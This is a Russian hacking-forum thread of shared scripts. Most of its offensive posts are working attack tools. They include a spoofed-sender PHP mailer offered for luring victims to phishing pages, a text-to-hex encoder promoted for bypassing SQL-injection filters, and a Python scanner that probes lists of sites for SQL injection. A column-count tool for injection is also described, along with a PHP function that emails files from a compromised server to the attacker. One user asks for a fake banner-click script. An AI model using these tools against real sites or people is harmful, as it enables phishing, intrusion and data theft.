Полезные скрипты

Discussion in 'PHP' started by SMiX, 2 Nov 2006.

  1. M()N$TeR

    M()N$TeR New Member

    Joined:
    26 Aug 2008
    Messages:
    4
    Likes Received:
    3
    Reputations:
    0
    Анонимные письма !

    Часто новички задаются вопросами вот как отослать анонимное мыло чтоб заманить жертву на фейк. вот простенький скрипт для отправки мыла на пхп коде:

    PHP:
    <HTML>
    <body bgcolor=fffafa>
    <h1 align="center"><font color=aaaaaa>This MailScript Produced by M()N$TeR</font></h1>
    <table align="center">
    <form method="POST" action="sendmail.php">
    <tr>От кого: <br>
    <input type="TEXT" name="frommail">
    <br>Кому:<br> <input type="TEXT" name="tomailz">
    <br>Тема: <br><input type="TEXT" name="mailtema">
    <br>Текст: <br>
    <td><textarea name="mailtext" rows="10" cols="60"></textarea></td>
    </tr>
    <tr>
    <td align=center><input type="submit" value="Отправить" name="submit"></td>
    </tr>
    </form>
    <?
    if (isset($submit)){

    mail($_POST['tomailz'],$_POST['mailtema'],$_POST['mailtext'],"From: $_POST['frommail'] ");
    echo "<h2>Сообщение отправлено!</h2>";
    }


    ?>
    </body>
    </html>
    ---------------------------------------------------------------------------------
    незабудте назвать ваш скрипт sendmail.php
     
    2 people like this.
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Text to HEX (ASCII to HEX) PHP

    Не знаю было тут или нет, поэтому заранее прошу прощения, если было. Скрипт для перекодировки текста в HEX в 2-х вариантах:

    1. 0x
    2. %

    PHP:
    <?
    $fout=fopen('url_in_HEX.txt','a+');
    $source_column2 fopen('source.txt','r'); 
    $source_column1 fgets($source_column2); 
    fwrite ($fout,$source_column1 "\r");
    fclose($source_column2);
    function 
    ascii2hex($ascii) {
    $hex '';
    for (
    $i 0$i strlen($ascii); $i++) {
    $byte strtoupper(dechex(ord($ascii{$i})));
    $byte str_repeat('0'strlen($byte)).$byte;
    $hex.=$byte." ";
    }
    return 
    $hex;
    }
    $source_column2 ascii2hex($source_column1);
    $patterns[0] = "/ /";
     
    $replacements[0] = "";
     
    $source_column3 preg_replace($patterns$replacements$source_column2);
     
    $source_column3 "0x$source_column3";
    $patterns[0] = "/ /";
    $replacements[0] = "%";
    $source_column4 preg_replace($patterns$replacements$source_column2);
    $source_column4 "%$source_column4";
    echo 
    "\n";
    echo 
    $source_column3;
    echo 
    "\n";
    echo 
    $source_column4;
    echo 
    "\n";
    fwrite ($fout,$source_column3 "\r");
    fwrite ($fout,$source_column4 "\r");
    fclose($fout);
    ?>
    где source.txt - файл с текстом, url_in_HEX.txt - результат.

    Очень удобно при SQL-inj, когда фильтруются кавычки и etc.

    В виде .exe (включая исходник) можно скачать здесь:

    http://pashkela.narod.ru/progi/Text2HEX.rar
     
  3. tick

    tick Elder - Старейшина

    Joined:
    10 Nov 2007
    Messages:
    35
    Likes Received:
    11
    Reputations:
    -12
    ребята, измените за оффтоп!

    Вот вчера был на сайте и видел скрипт, который короче при заходе на сайт кого либо активируеться баннер ну типа зарабаток деньги за клик, только им кликать не надо а тупо на сайт заходить. надеюсь вы меня поняли :d

    я 3 раза 40 стр перелесттал найти не могу, поиск не помог :(
     
  4. .::BARS::.

    .::BARS::. Elder - Старейшина

    Joined:
    13 Oct 2007
    Messages:
    379
    Likes Received:
    45
    Reputations:
    10
    не понятно... пример кинь если можешь... или подробней расскажи!? ты зашел на сайт, а там реклама и что дальше?
     
  5. mr.The

    mr.The Elder - Старейшина

    Joined:
    30 Apr 2007
    Messages:
    1,080
    Likes Received:
    456
    Reputations:
    38
    инфрейм либо javascript. врядли что-то ещё..
     
  6. tick

    tick Elder - Старейшина

    Joined:
    10 Nov 2007
    Messages:
    35
    Likes Received:
    11
    Reputations:
    -12
    Вот я зашел в эту тему! И был скрипт!

    "Вот вылаживаю скрипт, думаю пригоидться многим ко зарабатывает на кликах т.е. баннерах, когда кто-то входит на сайт он автоматически кликает на баннер т.е."

    Этот код внедрять в index.php надо!

    (млин сложно обьяснить я процитировал что человек говорил, он отписывался в этой теме).
     
  7. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    Может кому-то будет нужен;)
    Скрипт на перле качает фотки с xuk.ru

    Code:
    #Скрипт закачивает фотки с xuk.ru ;)
    use LWP;
    use strict;
    
    my $n = shift;
    my $html = '';
    if(defined($n))
    {
    	$html = "$n.html";
    	$n = " - $n";
    }
    my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst)=localtime(time);
    my $newdir = sprintf "%02u-%02u-%04u$n",$mday,$mon+1,$year+1900;
    mkdir $newdir || die 'cannot create directory';
    chdir $newdir;
    
    my $ua = LWP::UserAgent->new;
    my $res = $ua->get("http://xuk.ru/$html");
    die 'cannot connect' unless $res->is_success;
    my @main = split /\x0D\x0A/, $res->content;
    my @girl_url;
    
    foreach (@main)
    {
    	if(/vid-1\.html/)
    	{
    		push @girl_url, $& if /http:\/\/xuk\.ru\/.*vid-1\.html/;
    	}
    
    }
    
    foreach (@girl_url)
    {
    	my $folder = substr $&, 1, -11 if /\/[\w-]*\/vid-1.html/;
    	print "FOLDER: $folder\n";
    	mkdir $folder || die 'cannot create directory';
    	$res = $ua->get($_);
    	unless($res->is_success)
    	{
    		warn "cannot connect\n";
    		next
    	}
    	my @vid = split /\x0D\x0A/, $res->content;
    	my @foto_url;
    	foreach(@vid)
    	{
    		if(/<img alt="Эротика/)
    		{
    			push @foto_url, $& if /http:\/\/pic\.xuk\.ru\/files.*\.jpg/;
    		}
    	}
    	foreach (@foto_url)
    	{
    		my $filename = substr $&, 1 if /\/[\w-\(\)\.]*\.jpg/;
    		print "\tFILE: $filename\n";
    		$ua->get($_, ':content_file' => "$folder/$filename");
    	}
    }
    
    chdir '..';
    
    
     
  8. [Dezzter]

    [Dezzter] Elder - Старейшина

    Joined:
    26 Nov 2007
    Messages:
    182
    Likes Received:
    131
    Reputations:
    3
    Может у кого есть скрипт,который будет заливать файл с компьютера на хост, чтобы после закачки выдавал ссылку на закачанный файл, только ссылку зашифрованную
    и чтобы можно было заливать файл в разные папки на хосте, ну просто выбираешь категорию файла, например музыка и закачиваешь и файл закачивается в site.ru/music/ или выбираешь категорию programm то закачивается в site.ru/programm/
    Вообщем тут сделал не большую картинку для наглядного примера:
    [​IMG]
    [​IMG]
     
    #428 [Dezzter], 8 Sep 2008
    Last edited: 8 Sep 2008
  9. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    Обычный скрипт для загрузки изоражений напиши,а шифровку сделай через Base64,все будет намного проще!Тем более там всего лишь картинки,прятать нечего =)
     
  10. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    загрузчик изображений...

    PHP:
    <?  $dir1="./musik/";  $dir2="./film/";  
    $dir3="./123/";  ?>  <FORM ENCTYPE='multipart/form-data'  METHOD=POST>  
     файл: <INPUT NAME='front' TYPE='file'>  
    <select name="dir" size="1">  
    <option value="<? echo $dir1; ?>">Музыка </option>  
    <option value="<? echo $dir2; ?>">Фильмы </option> 
     <option value="<? echo $dir3; ?>">И т.д. </option> 
     </select>  <INPUT  TYPE='submit'>  
     </FORM>                
     <?php  $tmp_name="tmp.jpg";  
                         if(isset(
    $_FILES['front']['name']))
    {                                                    
    $tmpName $_FILES['front']['tmp_name'];  
    $name base64_encode($front); 
     
    $n=str_replace("=","",$name);                                              
     
    $newName $dir.$n.".jpg";               
    if(!
    is_uploaded_file($tmpName) || !move_uploaded_file($tmpName$newName))
    {  echo 
    "error";  
     
                                                                            
     } 
                                           
    }  
    ?>
    будут вопросы пиши, прокоментирую, что к чему...
     
    _________________________
    2 people like this.
  11. GumaNoiD

    GumaNoiD Elder - Старейшина

    Joined:
    25 Aug 2007
    Messages:
    67
    Likes Received:
    10
    Reputations:
    0
    Есть у кого сканер на sql инъекции?
     
  12. alextoun

    alextoun Вылет с Трассы

    Joined:
    7 May 2006
    Messages:
    563
    Likes Received:
    216
    Reputations:
    96
    Code:
    #!/usr/bin/python
    
    from sgmllib import SGMLParser
    import sys, urllib, re, urllib2, sets
    
    class URLLister(SGMLParser):
    	def reset(self):
    		SGMLParser.reset(self)
    		self.urls = []
    
    	def start_a(self, attrs):
    		href = [v for k, v in attrs if k=='href']
    		if href:
    			self.urls.extend(href)
     
    def test(host): 
    	source = urllib2.urlopen(host+sys.argv[2]).read() 
    	if re.search("Warning", source) != None: 
    		print "\n\t[!] SQL:",host+sys.argv[2]
    	if re.search("mysql_fetch_array()", source) != None:
    		print "\t[!] Found: mysql_fetch_array() error\n"
    	if re.search("You have an error in your SQL syntax", source) != None:
    		print "\t[!] Found: sql syntax error\n"
    		
    		
    print "\n\t   SQLtest v1.2"
    print "\t--------------------------------------------\n"
    			
    if len(sys.argv) != 3:
    	print "Usage : ./sqltest.py <list of sites> <payload (-1, 999999)>"
    	print "Eg: ./sqltest.py sites.txt \"-1\"\n"
    	sys.exit(1)
    	
    try:
    	sites = open(sys.argv[1], "r").readlines()
    except(IOError): 
      	print "Error: Check your site list path\n"
      	sys.exit(1)
    	
    print "[+] Loaded:",len(sites),"sites"
    print "[+] Payload:",sys.argv[2]
    
    for site in sites:
    	site = site.replace("\n","")
    	if site.find("http://") != -1:
    		site = site.replace("http://","")
    		site = "http://"+site.rsplit("/",1)[0]
    	if site.find("https://") != -1:
    		site = site.replace("https://","")
    		site = "https://"+site.rsplit("/",1)[0]
    	print "\n[+] Collecting:",site
    	try:
    		usock = urllib.urlopen(site)
    		parser = URLLister()
    		parser.feed(usock.read())
    		parser.close()
    		usock.close()
    		if len(parser.urls) >=1:
    			urls2 = []
    			for url in parser.urls: 
    				if url.find("://") == -1:
    					if url[0] == "/":
    						url = site+url
    					else:
    						url = site+"/"+url
    				if url.count("=") >= 2:
    					for x in xrange(url.count("=")):
    						urls2.append(url.rsplit("=",x+1)[0]+"=")
    				if url.find("=") != -1:
    					if url[0] == "/":
    						urls2.append(site+url.split("=",1)[0]+"=")
    					else:
    						urls2.append(url.split("=",1)[0]+"=")
    			urls2 = list(sets.Set(urls2))
    			print "[+] Links Found:",len(urls2),"\n"
    		else:
    			urls2 = []
    			print "[-] Error Connecting"
    		for url in urls2:
    			print "[+] Testing:",url+sys.argv[2]
    			try:
    				test(url)
    			except:
    				pass
    	except:
    		pass
    
    print "\n[-] Done\n"
    
    попробуй
     
  13. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    2GumaNoiD
    http://forum.antichat.ru/showpost.php?p=853130&postcount=15
     
  14. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    вот нашел у себя на винте, думаю кому нить полезно будет посмотреть...
    функция по отправке файла с сервера себе на мыло...
    PHP:
    function download_mail($dir,$file) {
     
    $demail="Ваше@мыло.ру";
     
    $buf explode("."$file);
     
    $dir str_replace("\\","/",$dir);
     
    $fullpath $dir."/".$file;
     
    $size tinhbyte(filesize($fullpath));
     
    $fp fopen($fullpath"rb");
     while(!
    feof($fp))

      
    $attachment .= fread($fp4096);
      
    $attachment base64_encode($attachment);
      
    $subject "тема сообщения ($file)";
      
      
    $boundary uniqid("NextPart_");
      
    $headers "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\"";

      
    $info "---==== Сообщение от ($demail)====---\n\n";
      
    $info .= "IP:\t$REMOTE_ADDR\n";
      
    $info .= "HOST:\t$HTTP_HOST\n";
      
    $info .= "URL:\t$HTTP_REFERER\n";
      
    $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
      
    $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";

      
    $send_to "$demail";             
       
      
    $send mail($send_to$subject$info$headers);
      
      if(
    $send == 2)  
       echo 
    "<br>
        
        <center>
        Спасибо!!!Файл <b>
    $file</b> отправлен вам на <u>$demail</u>.</center><br>";

    fclose($fp);
     }
    использавать так:
    download_mail($dir,$file);
    где $dir это директория на серваке, а $file файл который вы хотите отправить...
     
    _________________________
    #434 winstrool, 15 Sep 2008
    Last edited: 15 Sep 2008
    1 person likes this.
  15. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    MySQL_column

    Программа MySQL_column предназначена для автоматизации процесса узнавания кол-ва колонок при потенциальной sql-inj

    В комплекте 4 файла:

    1. mysql_column.exe - сама программа

    2. source_url.txt - файл инициализации URL, при котором можно получить SQL-inject (вам лишь следует скопировать нужный URL в этот файл и заменить вашу {sql} на "№"). Например здесь есть sql: http://www.sait.ru/index.php?id=5+union+select+1/*, значит в файл пишем: http://www.sait.ru/index.php?id=5№

    3. source_filtr.txt - файл инициализации фильтра (/*,-- или просто пусто). В данном случае "/*"

    4. source_host.txt - файл инициализации взламываемого хоста. Если посмотреть выше - то www.sait.ru

    5. После того, как вы занесли заполнили эти два файла (обязательное условие для корректной работы программы), можете запускать саму программу mysql_column.exe. Она автоматически выяснит и сохранит без вашего участия в файл output.txt следующие параметры:
    1) Правильное кол-во колонок
    2) Номер принтабельной колонки
    3) Валидный урл для получения информации при sql-inj


    Example: http://www.site.org/index.php?id=5+union+select+1,2,3?????????????/*

    source_url.tx: "http://www.site.org/index.php?id=5№"
    source_host.txt: "www.site.org"
    source_filtr.txt: "/*"

    (c)Pashkela

    скачать здесь:

    http://pashkela.narod.ru/progi/MySQL_column.rar
     
  16. heretic1990

    heretic1990 Elder - Старейшина

    Joined:
    2 Jul 2008
    Messages:
    487
    Likes Received:
    182
    Reputations:
    5
    кодировщик

    Кодировщик
    Code:
    <SCRIPT LANGUAGE="JavaScript">
    <!--
    
    // By PATRICK CLINGER ([email protected])
    // Web Site: http://www.proboards.com/
    // Script featured on Website Abstraction (http://wsabstract.com)
    // Over 400+ free scripts: Wsabstract.com<br>
    
    var letters = 'ЛМНОПрстуфхцчшщьыъэюяАБВГДЕЫЭЮЯкпghijklабвгдежзийКabvwxyzABCDEFef)_ЖЗИЙРСТУФХЦЧШЩЪЬ+|<>?:mnQRSTUЛМНОПрсту~!@лмно#$%^VWXYZ`1234567opGHIJKLu./;'+" "+';'+"'"+'[]MNOP890-='+'\\'+'&*("{},cdqrst'+"\n";
    var split = letters.split("");
    var num = '';
    var c = '';
    var encrypted = '';
    function encrypt(it){var b = '0';
    var chars = it.split("");
    while(b<it.length) {
    c = '0';
    while(c<letters.length){
    if(split[c] == chars[b]){
    if(c == "0") {
    c = ""; 
    }
    if(eval(c+10) >= letters.length){
    num = eval(10-(letters.length-c));
    encrypted += split[num];
    }
    else{
    num = eval(c+10);
    encrypted += split[num];
    }
    }
    c++;
    }
    b++;
    }
    document.forms[0].data.value = encrypted;encrypted = '';
    }
    function decrypt(it){
    var b = '0';
    var chars = it.split("");
    while(b<it.length){c = '0';
    while(c<letters.length){
    if(split[c] == chars[b]){
    if(c == "0") {
    c = "";
    }
    if(eval(c-10) < 0){
    num = eval(letters.length-(10-c));
    encrypted += split[num];
    }
    else
    {
    num = eval(c-10);
    encrypted += split[num];
    }
    }
    c++;
    }
    b++;
    }
    document.forms[0].data.value = encrypted;
    encrypted = '';
    }
    // -->
    </SCRIPT> 
    
    
     
  17. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    WordPress footer.php decoder

    Декодирует footer.php в WordPress. This tool is for decode footer.php in WordPress

    http://pashkela.narod.ru/progi/WordPress_footer_decoder.rar
     
  18. nikoTM

    nikoTM Elder - Старейшина

    Joined:
    25 Sep 2007
    Messages:
    41
    Likes Received:
    6
    Reputations:
    0

    баян! читайте на первых страницах...там есть такое.. точно тот же пост...
     
  19. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    nikoTM,зачем так паниковать?Это обычный пример из книги JS, и в интеренете полного такого,просто чел перед тем как постить не будет же листать 46 страниц и смотреть,нету ли дабл мессагов
     
    3 people like this.
  20. heretic1990

    heretic1990 Elder - Старейшина

    Joined:
    2 Jul 2008
    Messages:
    487
    Likes Received:
    182
    Reputations:
    5
    Скрипт Отправки E-mail по списку

    Скрипт Отправки E-mail по списку
    Скрипт надо вставить между <BODY> и </BODY>
    HTML:
    <FORM NAME="mailer" METHOD="post" ACTION="" ENCTYPE="text/plain" 
    onSubmit="(document.mailer.action += mailtoandsubject)"> 
    
    <!-- Original: Jeff Kieke -->
    
    <!-- This script and many more are available free online at -->
    <!-- The JavaScript Source!! http://javascript.internet.com -->
    
    <TABLE BORDER=0 bgcolor="#CCCCCC">
    <TR VALIGN="top">
    <TD>Получатель:</TD>
    <TD><SELECT NAME="mailtoperson" onChange="msg(this.form)">
    <OPTION VALUE="">-- Выбрать --
    <OPTION VALUE="[email protected]">[email protected]
    <OPTION VALUE="[email protected]">[email protected]
    <OPTION VALUE="[email protected]">[email protected]
    </SELECT></TD>
    </TR>
    <TR VALIGN="top">
    <TD>Ваше имя:</TD>
    <TD><INPUT TYPE="text" SIZE=35 NAME="name" onChange="msg(this.form)"></TD>
    </TR>
    <TR VALIGN="top">
    <TD>Ваш Email:</TD>
    <TD><INPUT TYPE="text" SIZE=35 NAME="email" onChange="msg(this.form)"></TD>
    </TR>
    <TR VALIGN="top">
    <TD>Важность:</TD>
    <TD>
    <SELECT NAME="priority" onChange="msg(this.form)">
    <OPTION VALUE="NaN" selected>Невыбрано
    <OPTION VALUE="Normal">Обыное
    <OPTION VALUE="Urgent">Важное
    <OPTION VALUE="No Reply Needed">Не очень важное
    </SELECT></TD>
    </TR>
    <TR VALIGN="top">
    <TD>Тема:</TD>
    <TD><INPUT TYPE="text" SIZE=35 NAME="subject" onChange="msg(this.form)"></TD>
    </TR>
    <TR VALIGN="top">
    <TD>Сообщение:</TD>
    <TD><TEXTAREA NAME="message" COLS=35 ROWS=5 WRAP="virtual" OnChange="msg(this.form)"></TEXTAREA></TD>
    </TR>
    <TR>
    <TD> </TD>
    <TD><INPUT TYPE="submit" VALUE="Отправить">
    <INPUT TYPE="reset" VALUE="Сброс"></TD>
    </TR>
    </TABLE>
    </FORM>
    
    <SCRIPT LANGUAGE="JavaScript">
    function msg() {
    document.mailer.action = "mailto:" 
    mailtoandsubject = ((document.mailer.mailtoperson.options[document.mailer.mailtoperson.selectedIndex].value) + '?subject=' + document.mailer.subject.value); 
    } 
    </SCRIPT> 
    
     
    3 people like this.